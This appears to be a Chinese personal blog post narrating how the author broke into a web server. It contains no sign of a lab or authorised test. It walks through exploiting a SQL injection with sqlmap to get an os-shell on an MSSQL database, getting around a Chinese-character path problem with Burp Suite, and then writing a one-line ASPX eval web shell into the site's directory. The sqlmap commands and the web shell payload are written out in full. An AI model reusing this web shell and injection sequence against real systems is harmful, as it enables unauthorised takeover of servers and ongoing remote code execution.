故事的起因是一个注入
存在注入点
神器sqlmap跑之
得出是mssql数据库
dba权限 –os-shell
一切都按照故事的发生着可是
当我执行net user 的时候问题发生了
百度一看权限不够 好吧 只能上传木马了
开始找路径
路径名到这一步全是中文的 但是貌似sqlmap查询除了点问题
这里提示没有标签
到这一步就这样了么 不
苦苦想终于想到了 我可以tree列举目录
中午跑了大概一小时吧
还没跑完第一个目录
当时心里是崩溃的
无奈试试反弹shell吧 第一次用
结果试了好几种办法 无奈总是超时
这是同事大牛说了句话 你可以查找一个html jpg啥的能搜索到绝对路径啊
我当时头嗡的一下 一语重地啊
很快找到绝对目录了
echo ^<^%^@ Page Language=”Jscript”^%^>^<^%eval^(Request.Item^[“value”^]^)^%^> > d:\……(绝对路径)
可是万恶的还是显示路径错误
在网上找了好多终于有一种说在外部写可以
sqlmap.py -r d://1.txt –hex –file-write d://2.txt –file-dest d:\……
可是又报错了
本来我以为没有上传权限后来才发现还是路径输入错误的问题
怎么办 后来大牛教的新姿势
sqlmap.py -r d://1.txt –os–shell –hex –proxy=127.0.0.1:8080
burpsuite监听之
发现中文目录是ascii hex编码
但是有错误 不知道是sqlmap的问题还是 中文的博大精深
于是抓包把路径重新编码 在发送 成功echo 小马到服务端
